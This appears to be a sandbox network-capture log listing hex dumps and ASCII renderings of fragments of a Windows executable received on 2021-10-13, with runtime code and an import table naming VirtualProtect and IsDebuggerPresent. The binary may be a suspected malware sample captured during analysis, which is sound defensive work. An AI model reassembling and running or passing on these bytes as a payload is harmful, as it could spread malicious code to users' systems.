2021-10-13 07:59:22 UTC	78	IN	Data Raw: 50 51 e8 d9 c9 00 00 83 c4 0c 89 5e 04 89 be 84 00 00 00 eb 02 8b f9 b8 00 80 00 00 3b f8 74 1c 8b 0e 2b c7 50 8b 46 10 03 c7 50 e8 7f 82 ff ff 8b d8 85 db 7e 06 01 9e 84 00 00 00 80 be 45 4c 00 00 00 8b 86 84 00 00 00 8d 48 e2 89 8e 88 00 00 00 74 0b 05 0c fe ff ff 89 86 88 00 00 00 8b 8e 8c 00 00 00 8b 46 04 89 86 94 00 00 00 83 f9 ff 74 15 48 03 c8 8b 86 88 00 00 00 3b c1 7c 02 8b c1 89 86 88 00 00 00 83 fb ff 5b 0f 95 c0 5f 5e c3 53 55 8b 6c 24 0c 8b d9 57 8b 7c 24 14 3b fd 74 10 c6 83 52 4c 00 00 01 73 07 c6 83 51 4c 00 00 01 80 bb 44 4c 00 00 00 74 46 2b fd 23 bb dc e6 00 00 76 73 8d 83 44 4b 00 00 56 57 55 8b c8 e8 5e e0 ff ff 8b f0 8d 8b 44 4b 00 00 56 55 e8 60 d2 ff ff 50 8b cb e8 5c 05 00 00 03 ee 8d 83 44 4b 00 00 23 ab dc e6 00 00 2b fe 75 ce Data Ascii: PQ^;t+PFP~ELHtFtH;\|[_^SUl$W\|$;tRLsQLDLtF+#vsDKVWU^DKVU`P\DK#+u
2021-10-13 07:59:22 UTC	86	IN	Data Raw: d0 4a 00 00 88 4f 14 88 4f 2c 8b 4c 24 1c 83 7c 24 2c 00 c6 87 d3 4a 00 00 00 0f 94 c0 89 8f e0 4a 00 00 80 7f 14 00 88 87 d2 4a 00 00 75 31 8d 47 18 c6 47 14 01 50 8d 47 04 8b cb 50 e8 f1 cf ff ff 84 c0 74 79 80 7f 29 00 75 09 80 bb 62 e6 00 00 00 74 6a 8b 4c 24 1c c6 83 62 e6 00 00 01 80 7c 24 13 00 75 0f 81 7f 18 00 00 02 00 7f 06 ff 44 24 14 eb 0c c6 87 d1 4a 00 00 01 c6 44 24 13 01 8b 47 24 81 c5 e4 4a 00 00 03 47 18 8b 54 24 18 03 d0 41 8b c6 89 54 24 18 2b c2 89 4c 24 1c 78 06 80 7f 28 00 75 1b 3d 00 04 00 00 7c 14 8b 43 1c 03 c0 3b c8 0f 82 f9 fe ff ff eb 05 c6 44 24 12 01 8b 4c 24 14 33 d2 8b c1 f7 73 1c 8b f8 85 d2 74 01 47 33 ed 85 c9 74 64 33 d2 8d 74 24 34 69 c7 e4 4a 00 00 89 54 24 24 89 44 24 30 8b 44 24 14 8b ce 03 53 18 2b c5 83 c6 08 89 Data Ascii: JOO,L$\|$,JJJu1GGPGPty)ubtjL$b\|$uD$JD$G$JGT$AT$+L$x(u=\|C;D$L$3stG3td3t$4iJT$$D$0D$S+
2021-10-13 07:59:22 UTC	94	IN	Data Raw: b4 8d 44 24 24 50 6a 45 e8 5f 90 fe ff ff 74 24 14 8b 06 8d 4e 1e 51 8b ce ff 50 04 8b 06 8b ce 6a 00 ff 74 24 20 ff 74 24 28 ff 50 10 32 c0 e9 94 00 00 00 e8 01 b6 fe ff 83 be dc 21 00 00 02 75 2a 8b ce e8 f2 9b fe ff 8b 8e a8 6c 00 00 2b 8e d8 32 00 00 8b 86 ac 6c 00 00 1b 86 dc 32 00 00 8b 16 6a 00 50 51 8b ce ff 52 10 85 ff 74 56 83 fd 05 75 06 c6 47 4f 00 eb 1b 8a 83 99 10 00 00 88 47 4f 8b 83 58 10 00 00 89 47 20 8b 83 5c 10 00 00 89 47 24 8b ce e8 64 13 ff ff 83 67 70 00 8d 8f 90 00 00 00 83 67 74 00 89 47 58 8b 44 24 18 89 57 5c ff b0 d8 82 00 00 ff b3 70 10 00 00 e8 82 23 ff ff b0 01 5f 5e 5d 5b 81 c4 14 20 00 00 c2 10 00 56 8b f1 33 c0 6a 10 50 89 46 18 89 46 1c 8d 46 20 50 c7 06 98 30 43 00 c7 46 04 bc 30 43 00 c7 46 08 f8 30 43 00 c7 46 0c 34 Data Ascii: D$$PjE_t$NQPjt$ t$(P2!u*l+2l2jPQRtVuGOGOXG \G$dgpgtGXD$W\p#_^][ V3jPFFF P0CF0CF0CF4
2021-10-13 07:59:22 UTC	102	IN	Data Raw: 60 21 43 00 ff b4 24 2c 20 00 00 8d 44 24 18 50 57 e8 7b 58 ff ff 33 c0 66 89 03 5f 8b c6 5d eb 02 33 c0 5e 5b 81 c4 04 20 00 00 c2 18 00 55 8b ec 51 51 53 8d 45 f8 50 ff 15 08 df 43 00 8d 45 fc 50 33 c0 50 50 ff 75 0c 50 ff 15 fc de 43 00 8b d8 f7 db 1a db 80 c3 01 74 22 ff 75 08 ff 75 fc ff 15 10 df 43 00 ff 75 fc 48 f7 d8 1a c0 8d 58 01 8b 45 f8 50 8b 08 ff 51 14 eb 08 8b 45 08 33 c9 66 89 08 8a c3 5b 8b e5 5d c2 08 00 b8 04 20 00 00 e8 88 36 00 00 53 55 56 57 68 00 00 08 00 e8 8d 88 00 00 8b f0 59 85 f6 75 0a b9 e0 00 44 00 e8 63 ca fe ff 8b 9c 24 18 20 00 00 33 c0 33 ed 66 89 06 8b fd eb 6e 66 39 2e 75 08 66 83 7c 24 14 7b 74 61 66 83 7c 24 14 7d 74 7b 8d 44 24 14 50 e8 2b 88 00 00 03 c7 59 3d fb ff 03 00 77 67 8d 44 24 14 50 56 e8 d0 c3 00 00 56 e8 Data Ascii: `!C$, D$PW{X3f_]3^[ UQQSEPCEP3PPuPCt"uuCuHXEPQE3f[] 6SUVWhYuDc$ 33fnf9.uf\|${taf\|$}t{D$P+Y=wgD$PVV
2021-10-13 07:59:22 UTC	109	IN	Data Raw: 8c 00 00 83 c4 10 66 89 6c 7e 02 33 c0 66 89 2e 66 89 44 7e 04 ff 74 24 18 56 53 e8 31 39 ff ff 56 e8 85 19 00 00 59 5f 5e 5d 8b c3 5b c2 08 00 83 ec 5c 53 55 56 57 e8 ec e1 ff ff 6a 68 ff 35 c8 75 44 00 ff 15 e0 df 43 00 8b 3d 7c df 43 00 33 db 8b f0 bd c2 00 00 00 38 1d d6 75 44 00 75 30 8b 0d e8 75 44 00 e8 9d c3 ff ff 6a 05 56 ff 15 e8 df 43 00 6a ff 53 68 b1 00 00 00 56 ff d7 68 e4 22 43 00 53 55 56 ff d7 c6 05 d6 75 44 00 01 b8 00 e1 f5 05 50 50 68 b1 00 00 00 56 ff d7 8d 44 24 10 c7 44 24 10 5c 00 00 00 50 53 68 3a 04 00 00 56 ff d7 33 c9 88 5c 24 29 8a 5c 24 70 41 89 4c 24 14 84 db 74 1f 8b 44 24 18 25 ff ff ff bf c7 44 24 24 a0 00 00 00 0b c1 c7 44 24 14 01 00 00 40 89 44 24 18 8d 44 24 10 50 51 68 44 04 00 00 56 ff d7 ff 74 24 74 6a 00 55 56 ff Data Ascii: fl~3f.fD~t$VS19VY_^][\SUVWjh5uDC=\|C38uDu0uDjVCjShVh"CSUVuDPPhVD$D$\PSh:V3\$)\$pAL$tD$%D$$D$@D$D$PQhDVt$tjUV
2021-10-13 07:59:22 UTC	117	IN	Data Raw: 02 fb ff ff 59 84 c0 75 07 6a 07 e8 45 04 00 00 32 db 88 5d e7 83 65 fc 00 e8 b3 fa ff ff 88 45 dc a1 7c fe 45 00 33 c9 41 3b c1 74 dc 85 c0 75 49 89 0d 7c fe 45 00 68 b4 22 43 00 68 98 22 43 00 e8 df 96 00 00 59 59 85 c0 74 11 c7 45 fc fe ff ff ff b8 ff 00 00 00 e9 f6 00 00 00 68 94 22 43 00 68 64 22 43 00 e8 5d 96 00 00 59 59 c7 05 7c fe 45 00 02 00 00 00 eb 05 8a d9 88 5d e7 ff 75 dc e8 d9 fb ff ff 59 e8 6c 06 00 00 8b f0 33 ff 39 3e 74 1a 56 e8 3b fb ff ff 59 84 c0 74 0f 57 6a 02 57 8b 36 8b ce e8 90 01 00 00 ff d6 e8 4b 06 00 00 8b f0 39 3e 74 13 56 e8 16 fb ff ff 59 84 c0 74 08 ff 36 e8 b9 8a 00 00 59 e8 9e 04 00 00 0f b7 c0 50 e8 9b 95 00 00 50 57 68 00 00 40 00 e8 31 ea ff ff 8b f0 e8 a6 89 00 00 84 c0 75 06 56 e8 c5 8a 00 00 84 db 75 05 e8 5f 8a Data Ascii: YujE2]eE\|E3A;tuI\|Eh"Ch"CYYtEh"Chd"C]YY\|E]uYl39>tV;YtWjW6K9>tVYt6YPPWh@1uVu_
2021-10-13 07:59:22 UTC	125	IN	Data Raw: 8d 0c 4d ff ff ff ff 85 c9 0f 85 e7 fc ff ff 0f b6 7e f8 0f b6 42 f8 2b f8 74 16 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff 85 c9 0f 85 c5 fc ff ff 0f b6 7e f9 0f b6 42 f9 2b f8 74 16 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff 85 c9 0f 85 a3 fc ff ff 0f b6 4e fa 0f b6 42 fa 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 7d fc ff ff 8b 46 fb 3b 42 fb 0f 84 81 00 00 00 0f b6 f8 0f b6 42 fb 2b f8 74 16 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff 85 c9 0f 85 50 fc ff ff 0f b6 7e fc 0f b6 42 fc 2b f8 74 16 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff 85 c9 0f 85 2e fc ff ff 0f b6 7e fd 0f b6 42 fd 2b f8 74 16 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff 85 c9 0f 85 0c fc ff ff 0f b6 4e fe 0f b6 42 fe 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c Data Ascii: M~B+t3M~B+t3MNB+t3E3}F;BB+t3MP~B+t3M.~B+t3MNB+t3
2021-10-13 07:59:22 UTC	133	IN	Data Raw: 83 7b 0c 00 0f 84 a1 00 00 00 8d 45 fc 50 8d 45 f8 50 ff 75 1c ff 75 20 53 e8 f3 d1 ff ff 8b 4d f8 83 c4 14 8b 55 fc 3b ca 73 79 8d 70 0c 8b 45 1c 3b 46 f4 7c 63 3b 46 f8 7f 5e 8b 06 8b 7e 04 c1 e0 04 8b 7c 07 f4 85 ff 74 13 8b 56 04 8b 5c 02 f4 8b 55 fc 80 7b 08 00 8b 5d 18 75 38 8b 7e 04 83 c7 f0 03 c7 8b 7d 08 f6 00 40 75 28 6a 01 ff 75 24 8d 4e f4 ff 75 20 51 6a 00 50 53 ff 75 14 ff 75 10 ff 75 0c 57 e8 dc fa ff ff 8b 55 fc 83 c4 2c 8b 4d f8 8b 45 1c 41 83 c6 14 89 4d f8 3b ca 72 8d 5e 5b 5f 8b e5 5d c3 e8 29 48 00 00 cc 55 8b ec 83 ec 18 53 56 8b 75 0c 57 85 f6 0f 84 82 00 00 00 8b 3e 33 db 85 ff 7e 71 8b 45 08 8b d3 89 5d fc 8b 40 1c 8b 40 0c 8b 08 83 c0 04 89 4d f0 89 45 e8 8b c8 8b 45 f0 89 4d f4 89 45 f8 85 c0 7e 3b 8b 46 04 03 c2 89 45 ec 8b 55 Data Ascii: {EPEPuu SMU;sypE;F\|c;F^~\|tV\U{]u8~}@u(ju$Nu QjPSuuuWU,MEAM;r^[_])HUSVuW>3~qE]@@MEEME~;FEU
2021-10-13 07:59:22 UTC	141	IN	Data Raw: 18 50 53 8d 86 48 04 00 00 6a 20 50 e8 13 f3 ff ff 83 c4 10 ff 76 0c 8d 46 18 50 57 8d 45 fc 8d 8e 48 04 00 00 50 e8 18 0d 00 00 8b 4e 20 8d 7e 18 8b c1 c1 e8 03 a8 01 74 1b c1 e9 02 f6 c1 01 75 13 57 53 8d 86 48 04 00 00 6a 30 50 e8 d2 f2 ff ff 83 c4 10 6a 00 8b ce e8 b3 0b 00 00 83 3f 00 7c 1d 8b 46 20 c1 e8 02 a8 01 74 13 57 53 8d 86 48 04 00 00 6a 20 50 e8 a7 f2 ff ff 83 c4 10 b0 01 5f 5e 5b 8b e5 5d c3 8b ff 55 8b ec 83 ec 0c a1 68 d6 43 00 33 c5 89 45 fc 53 56 8b f1 33 db 6a 41 5a 6a 58 0f b7 46 32 59 83 f8 64 7f 6b 0f 84 92 00 00 00 3b c1 7f 3e 74 36 3b c2 0f 84 94 00 00 00 83 f8 43 74 3f 83 f8 44 7e 1d 83 f8 47 0f 8e 81 00 00 00 83 f8 53 75 0f 8b ce e8 d8 09 00 00 84 c0 0f 85 a0 00 00 00 32 c0 e9 e4 01 00 00 6a 01 6a 10 eb 57 83 e8 5a 74 15 83 e8 Data Ascii: PSHj PvFPWEHPN ~tuWSHj0Pj?\|F tWSHj P_^[]UhC3ESV3jAZjXF2Ydk;>t6;Ct?D~GSu2jjWZt
2021-10-13 07:59:22 UTC	148	IN	Data Raw: fb 2b 75 0e 8b 75 0c 8a 1e 46 88 5d fc 89 75 0c eb 03 8b 75 0c 85 ff 74 05 83 ff 10 75 78 8a c3 2c 30 3c 09 77 08 0f be c3 83 c0 d0 eb 23 8a c3 2c 61 3c 19 77 08 0f be c3 83 c0 a9 eb 13 8a c3 2c 41 3c 19 77 08 0f be c3 83 c0 c9 eb 03 83 c8 ff 85 c0 74 09 85 ff 75 3d 6a 0a 5f eb 38 8a 06 46 88 45 f0 89 75 0c 3c 78 74 1b 3c 58 74 17 85 ff 75 03 6a 08 5f ff 75 f0 8d 4d 0c e8 ed 07 00 00 8b 75 0c eb 10 85 ff 75 03 6a 10 5f 8a 1e 46 88 5d fc 89 75 0c 33 d2 83 c8 ff f7 f7 89 55 ec 8b 55 f8 89 45 f0 8d 4b d0 80 f9 09 77 08 0f be cb 83 c1 d0 eb 23 8a c3 2c 61 3c 19 77 08 0f be cb 83 c1 a9 eb 13 8a c3 2c 41 3c 19 77 08 0f be cb 83 c1 c9 eb 03 83 c9 ff 83 f9 ff 74 30 3b cf 73 2c 8b 45 f4 83 ca 08 8b 5d f0 3b c3 72 0c 75 05 3b 4d ec 76 05 83 ca 04 eb 08 0f af c7 03 Data Ascii: +uuF]uutux,0<w#,a<w,A<wtu=j_8FEu<xt<Xtuj_uMuuj_F]u3UUEKw#,a<w,A<wt0;s,E];ru;Mv
2021-10-13 07:59:22 UTC	156	IN	Data Raw: 00 8b f8 ff 15 b4 21 43 00 8d 85 d8 fc ff ff 50 ff 15 b0 21 43 00 85 c0 75 13 85 ff 75 0f 83 7d 08 ff 74 09 ff 75 08 e8 84 69 ff ff 59 8b 4d fc 33 cd 5f e8 eb 64 ff ff 8b e5 5d c3 8b ff 55 8b ec ff 75 08 b9 00 04 46 00 e8 f0 e9 ff ff 5d c3 8b ff 55 8b ec 51 a1 68 d6 43 00 33 c5 89 45 fc 56 e8 54 08 00 00 85 c0 74 35 8b b0 5c 03 00 00 85 f6 74 2b ff 75 18 ff 75 14 ff 75 10 ff 75 0c ff 75 08 8b ce ff 15 60 22 43 00 ff d6 8b 4d fc 83 c4 14 33 cd 5e e8 88 64 ff ff 8b e5 5d c3 ff 75 18 8b 35 68 d6 43 00 8b ce ff 75 14 33 35 00 04 46 00 83 e1 1f ff 75 10 d3 ce ff 75 0c ff 75 08 85 f6 75 be e8 11 00 00 00 cc 33 c0 50 50 50 50 50 e8 79 ff ff ff 83 c4 14 c3 6a 17 e8 90 8e 00 00 85 c0 74 05 6a 05 59 cd 29 56 6a 01 be 17 04 00 c0 56 6a 02 e8 06 fe ff ff 83 c4 0c 56 Data Ascii: !CP!Cuu}tuiYM3_d]UuF]UQhC3EVTt5\t+uuuuu`"CM3^d]u5hCu35Fuuuu3PPPPPyjtjY)VjVjV
2021-10-13 07:59:22 UTC	164	IN	Data Raw: 43 00 6a 14 e8 67 fd ff ff 8b f0 83 c4 10 85 f6 74 15 ff 75 10 8b ce ff 75 0c ff 75 08 ff 15 60 22 43 00 ff d6 eb 0c ff 75 0c ff 75 08 ff 15 d8 21 43 00 8b 4d fc 33 cd 5e e8 a5 45 ff ff 8b e5 5d c2 0c 00 8b ff 55 8b ec 51 a1 68 d6 43 00 33 c5 89 45 fc 56 68 8c 60 43 00 68 84 60 43 00 68 8c 60 43 00 6a 16 e8 05 fd ff ff 8b f0 83 c4 10 85 f6 74 27 ff 75 28 8b ce ff 75 24 ff 75 20 ff 75 1c ff 75 18 ff 75 14 ff 75 10 ff 75 0c ff 75 08 ff 15 60 22 43 00 ff d6 eb 20 ff 75 1c ff 75 18 ff 75 14 ff 75 10 ff 75 0c 6a 00 ff 75 08 e8 18 00 00 00 50 ff 15 10 22 43 00 8b 4d fc 33 cd 5e e8 1d 45 ff ff 8b e5 5d c2 24 00 8b ff 55 8b ec 51 a1 68 d6 43 00 33 c5 89 45 fc 56 68 a4 60 43 00 68 9c 60 43 00 68 a4 60 43 00 6a 18 e8 7d fc ff ff 8b f0 83 c4 10 85 f6 74 12 ff 75 0c Data Ascii: Cjgtuuu`"Cuu!CM3^E]UQhC3EVh`Ch`Ch`Cjt'u(u$u uuuuuu`"C uuuuujuP"CM3^E]$UQhC3EVh`Ch`Ch`Cj}tu
2021-10-13 07:59:22 UTC	172	IN	Data Raw: fc 33 c9 8b d1 57 bf 00 00 08 00 a8 3f 74 29 a8 01 74 03 6a 10 5a a8 04 74 03 83 ca 08 a8 08 74 03 83 ca 04 a8 10 74 03 83 ca 02 a8 20 74 03 83 ca 01 a8 02 74 02 0b d7 0f ae 5d f8 8b 45 f8 83 e0 c0 89 45 f4 0f ae 55 f4 8b 45 f8 a8 3f 74 29 a8 01 74 03 6a 10 59 a8 04 74 03 83 c9 08 a8 08 74 03 83 c9 04 a8 10 74 03 83 c9 02 a8 20 74 03 83 c9 01 a8 02 74 02 0b cf 0b ca 8b c1 5f eb 3d 66 8b 4d fc 33 c0 f6 c1 3f 74 32 f6 c1 01 74 03 6a 10 58 f6 c1 04 74 03 83 c8 08 f6 c1 08 74 03 83 c8 04 f6 c1 10 74 03 83 c8 02 f6 c1 20 74 03 83 c8 01 f6 c1 02 74 05 0d 00 00 08 00 8b e5 5d c3 8b ff 55 8b ec 83 ec 10 9b d9 7d f8 66 8b 45 f8 33 c9 a8 01 74 03 6a 10 59 a8 04 74 03 83 c9 08 a8 08 74 03 83 c9 04 a8 10 74 03 83 c9 02 a8 20 74 03 83 c9 01 a8 02 74 06 81 c9 00 00 08 Data Ascii: 3W?t)tjZttt tt]EEUE?t)tjYttt tt_=fM3?t2tjXttt tt]U}fE3tjYttt tt
2021-10-13 07:59:22 UTC	180	IN	Data Raw: 00 00 8b 47 0c c1 e8 0d a8 01 74 32 83 fb 01 75 11 57 e8 49 ff ff ff 59 83 f8 ff 74 21 ff 45 e4 eb 1c 85 db 75 18 8b 47 0c d1 e8 a8 01 74 0f 57 e8 2b ff ff ff 59 83 f8 ff 75 03 09 45 dc 83 65 fc 00 e8 0e 00 00 00 8b 45 d4 83 c6 04 eb 95 8b 5d 08 8b 75 e0 ff 75 d8 e8 25 b7 ff ff 59 c3 c7 45 fc fe ff ff ff e8 14 00 00 00 83 fb 01 8b 45 e4 74 03 8b 45 dc e8 1b 08 ff ff c3 8b 5d 08 6a 08 e8 53 be ff ff 59 c3 8b ff 55 8b ec 56 8b 75 08 57 8d 7e 0c 8b 07 c1 e8 0d a8 01 74 24 8b 07 c1 e8 06 a8 01 74 1b ff 76 04 e8 01 9f ff ff 59 b8 bf fe ff ff f0 21 07 33 c0 89 46 04 89 06 89 46 08 5f 5e 5d c3 8b ff 55 8b ec 8b 4d 08 83 f9 fe 75 0d e8 54 a3 ff ff c7 00 09 00 00 00 eb 38 85 c9 78 24 3b 0d 20 06 46 00 73 1c 8b c1 83 e1 3f c1 f8 06 6b c9 30 8b 04 85 20 04 46 00 0f Data Ascii: Gt2uWIYt!EuGtW+YuEeE]uu%YEEtE]jSYUVuW~t$tvY!3FF_^]UMuT8x$; Fs?k0 F
2021-10-13 07:59:22 UTC	188	IN	Data Raw: ff ff 00 9b 8a 8d 61 ff ff ff d0 e1 d0 f9 d0 c1 8a c1 24 0f d7 0f be c0 81 e1 04 04 00 00 8b da 03 d8 83 c3 10 ff 23 80 7a 0e 05 75 11 66 8b 9d 5c ff ff ff 80 cf 02 80 e7 fe b3 3f eb 04 66 bb 3f 13 66 89 9d 5e ff ff ff d9 ad 5e ff ff ff bb 5e 8d 43 00 d9 e5 89 95 6c ff ff ff 9b dd bd 60 ff ff ff c6 85 70 ff ff ff 00 d9 c9 8a 8d 61 ff ff ff d9 e5 9b dd bd 60 ff ff ff d9 c9 8a ad 61 ff ff ff d0 e5 d0 fd d0 c5 8a c5 24 0f d7 8a e0 d0 e1 d0 f9 d0 c1 8a c1 24 0f d7 d0 e4 d0 e4 0a c4 0f be c0 81 e1 04 04 00 00 8b da 03 d8 83 c3 10 ff 23 e8 ce 00 00 00 d9 c9 dd d8 c3 e8 c4 00 00 00 eb f6 dd d8 dd d8 d9 ee c3 dd d8 dd d8 d9 ee 84 ed 74 02 d9 e0 c3 dd d8 dd d8 d9 e8 c3 db bd 62 ff ff ff db ad 62 ff ff ff f6 85 69 ff ff ff 40 74 08 c6 85 70 ff ff ff 00 c3 c6 85 70 Data Ascii: a$#zuf\?f?f^^^Cl`pa`a$$#tbbi@tpp
2021-10-13 07:59:22 UTC	195	IN	Data Raw: 77 00 65 00 64 00 20 00 61 00 72 00 72 00 61 00 79 00 20 00 73 00 69 00 7a 00 65 00 20 00 28 00 25 00 75 00 29 00 20 00 69 00 73 00 20 00 65 00 78 00 63 00 65 00 65 00 64 00 65 00 64 00 00 00 43 00 4d 00 54 00 00 00 52 00 52 00 00 00 00 00 68 00 25 00 75 00 00 00 68 00 63 00 25 00 75 00 00 00 00 00 78 00 25 00 75 00 00 00 78 00 63 00 25 00 75 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3b 00 25 00 75 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 0e 0a 04 08 09 0f 0d 06 01 0c 00 02 0b 07 05 03 0b 08 0c 00 05 02 0f 0d 0a 0e 03 06 07 01 09 04 07 09 03 01 0d 0c 0b 0e 02 06 05 0a 04 00 0f 08 09 00 05 07 02 04 0a 0f 0e 01 0b 0c 06 08 03 0d 02 0c 06 0a 00 0b 08 03 04 0d 07 05 0f 0e 01 09 0c 05 01 0f 0e 0d 04 0a 00 07 06 03 09 02 08 Data Ascii: wed array size (%u) is exceededCMTRRh%uhc%ux%uxc%u;%u
2021-10-13 07:59:22 UTC	203	IN	Data Raw: 60 22 43 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 6c 98 43 00 5c 18 41 00 c3 80 41 00 b4 98 43 00 5c 18 41 00 c3 80 41 00 00 99 43 00 71 e2 41 00 c3 80 41 00 62 61 64 20 61 72 72 61 79 20 6e 65 77 20 6c 65 6e 67 74 68 00 00 00 00 c0 fe 45 00 10 ff 45 00 63 73 6d e0 01 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 20 05 93 19 00 00 00 00 00 00 00 00 cc 17 42 00 50 99 43 00 71 e2 41 00 c3 80 41 00 62 61 64 20 65 78 63 65 70 74 69 6f 6e 00 00 00 08 43 43 00 1c 43 43 00 58 43 43 00 90 28 43 00 61 00 64 00 76 00 61 00 70 00 69 00 33 00 32 00 00 00 00 00 3c 00 70 00 69 00 2d 00 6d 00 73 00 2d 00 77 00 69 00 6e 00 2d 00 63 00 6f 00 72 00 65 00 2d 00 66 00 69 00 62 00 65 00 72 00 73 00 2d 00 6c 00 31 00 2d 00 31 00 2d 00 31 00 00 00 3c 00 70 00 69 00 2d Data Ascii: `"ClC\AAC\AACqAAbad array new lengthEEcsm BPCqAAbad exceptionCCCCXCC(Cadvapi32<pi-ms-win-core-fibers-l1-1-1<pi-
2021-10-13 07:59:22 UTC	211	IN	Data Raw: 32 1f 39 2e 03 02 45 5a 25 f8 d2 71 56 4a c2 c3 da 07 00 00 10 8f 2e a8 08 43 b2 aa 7c 1a 21 8e 40 ce 8a f3 0b ce c4 84 27 0b eb 7c c3 94 25 ad 49 12 00 00 00 40 1a dd da 54 9f cc bf 61 59 dc ab ab 5c c7 0c 44 05 f5 67 16 bc d1 52 af b7 fb 29 8d 8f 60 94 2a 00 00 00 00 00 21 0c 8a bb 17 a4 8e af 56 a9 9f 47 06 36 b2 4b 5d e0 5f dc 80 0a aa fe f0 40 d9 8e a8 d0 80 1a 6b 23 63 00 00 64 38 4c 32 96 c7 57 83 d5 42 4a e4 61 22 a9 d9 3d 10 3c bd 72 f3 e5 91 74 15 59 c0 0d a6 1d ec 6c d9 2a 10 d3 e6 00 00 00 10 85 1e 5b 61 4f 6e 69 2a 7b 18 1c e2 50 04 2b 34 dd 2f ee 27 50 63 99 71 c9 a6 16 e9 4a 8e 28 2e 08 17 6f 6e 49 1a 6e 19 02 00 00 00 40 32 26 40 ad 04 50 72 1e f9 d5 d1 94 29 bb cd 5b 66 96 2e 3b a2 db 7d fa 65 ac 53 de 77 9b a2 20 b0 53 f9 bf c6 ab 25 94 Data Ascii: 29.EZ%qVJ.C\|!@'\|%I@TaY\DgR)`!VG6K]_@k#cd8L2WBJa"=<rtYl[aOni*{P+4/'PcqJ(.onIn@2&@Pr)[f.;}eSw S%
2021-10-13 07:59:22 UTC	219	IN	Data Raw: 7c 88 43 00 8d 00 00 00 b8 73 43 00 36 00 00 00 88 88 43 00 7e 00 00 00 b0 72 43 00 14 00 00 00 94 88 43 00 56 00 00 00 b8 72 43 00 15 00 00 00 a0 88 43 00 57 00 00 00 ac 88 43 00 98 00 00 00 b8 88 43 00 8c 00 00 00 c8 88 43 00 9f 00 00 00 d8 88 43 00 a8 00 00 00 c0 72 43 00 16 00 00 00 e8 88 43 00 58 00 00 00 c8 72 43 00 17 00 00 00 f4 88 43 00 59 00 00 00 e8 73 43 00 3c 00 00 00 00 89 43 00 85 00 00 00 0c 89 43 00 a7 00 00 00 18 89 43 00 76 00 00 00 24 89 43 00 9c 00 00 00 d8 72 43 00 19 00 00 00 30 89 43 00 5b 00 00 00 18 73 43 00 22 00 00 00 3c 89 43 00 64 00 00 00 48 89 43 00 be 00 00 00 58 89 43 00 c3 00 00 00 68 89 43 00 b0 00 00 00 78 89 43 00 b8 00 00 00 88 89 43 00 cb 00 00 00 98 89 43 00 c7 00 00 00 e0 72 43 00 1a 00 00 00 a8 89 43 00 5c 00 00 Data Ascii: \|CsC6C~rCCVrCCWCCCCrCCXrCCYsC<CCCv$CrC0C[sC"<CdHCXChCxCCCrCC\
2021-10-13 07:59:22 UTC	227	IN	Data Raw: 08 a0 43 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4c a0 43 00 01 00 00 00 54 a0 43 00 01 00 00 00 d0 dd 43 00 00 00 00 00 ff ff ff ff 00 00 00 00 04 00 00 00 00 00 00 00 ff ff ff ff 77 12 43 00 ff ff ff ff 82 12 43 00 01 00 00 00 8d 12 43 00 22 05 93 19 03 00 00 00 70 a0 43 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff 5a 12 43 00 00 00 00 00 62 12 43 00 22 05 93 19 02 00 00 00 ac a0 43 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff c7 12 43 00 22 05 93 19 01 00 00 00 e0 a0 43 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff fc 12 43 00 00 00 00 00 07 13 43 00 22 05 93 Data Ascii: CLCTCCwCCC"pCZCbC"CC"CCC"
2021-10-13 07:59:22 UTC	234	IN	Data Raw: 52 00 47 64 69 70 43 72 65 61 74 65 42 69 74 6d 61 70 46 72 6f 6d 53 74 72 65 61 6d 49 43 4d 00 5f 00 47 64 69 70 43 72 65 61 74 65 48 42 49 54 4d 41 50 46 72 6f 6d 42 69 74 6d 61 70 00 75 02 47 64 69 70 6c 75 73 53 74 61 72 74 75 70 00 00 74 02 47 64 69 70 6c 75 73 53 68 75 74 64 6f 77 6e 00 67 64 69 70 6c 75 73 2e 64 6c 6c 00 b1 03 52 61 69 73 65 45 78 63 65 70 74 69 6f 6e 00 00 73 02 47 65 74 53 79 73 74 65 6d 49 6e 66 6f 00 ef 04 56 69 72 74 75 61 6c 50 72 6f 74 65 63 74 00 00 f1 04 56 69 72 74 75 61 6c 51 75 65 72 79 00 00 3d 03 4c 6f 61 64 4c 69 62 72 61 72 79 45 78 41 00 00 04 03 49 73 50 72 6f 63 65 73 73 6f 72 46 65 61 74 75 72 65 50 72 65 73 65 6e 74 00 00 03 49 73 44 65 62 75 67 67 65 72 50 72 65 73 65 6e 74 00 d3 04 55 6e 68 61 6e 64 6c 65 64 Data Ascii: RGdipCreateBitmapFromStreamICM_GdipCreateHBITMAPFromBitmapuGdiplusStartuptGdiplusShutdowngdiplus.dllRaiseExceptionsGetSystemInfoVirtualProtectVirtualQuery=LoadLibraryExAIsProcessorFeaturePresentIsDebuggerPresentUnhandled
